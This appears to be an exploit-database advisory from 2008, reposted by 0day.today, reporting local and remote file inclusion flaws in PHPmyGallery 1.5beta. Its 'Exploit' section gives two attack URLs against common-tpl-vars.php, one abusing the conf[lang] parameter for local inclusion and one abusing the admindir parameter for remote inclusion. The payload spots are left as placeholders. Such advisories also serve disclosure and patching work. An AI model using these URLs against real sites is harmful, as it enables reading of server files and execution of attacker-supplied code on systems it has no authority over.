id: 4399
date: 12/09/2008
title: PHPmyGallery 1.5beta (common-tpl-vars.php) LFI/RFI Vulnerabilities
author: CoBRa_21
cves: 

==================================================================
PHPmyGallery 1.5beta (common-tpl-vars.php) LFI/RFI Vulnerabilities
==================================================================


*****************************************************************************************

Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities

*****************************************************************************************
 
Script Name: Phpmygallery
 
Version: 1.5beta
 
Autor: CoBRa_21
 
My Site: www.ipbul.org
 
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
 
*****************************************************************************************
 
Exploit:
 
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFI] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]

*****************************************************************************************



#  0day.today [2023-03-26]  #